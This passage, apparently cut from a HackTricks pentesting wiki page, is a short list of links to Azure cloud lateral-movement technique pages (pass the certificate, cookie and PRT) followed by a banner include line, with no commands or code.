Certificate**](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/az-pass-the-certificate) (cloud) +- [**Pass the cookie**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html) (cloud) +- [**Pass the PRT**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html) (cloud) +- [**Pass the AzureAD Certificate**](https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html) (cloud) {{#include ../../banners/hacktricks-training.md}}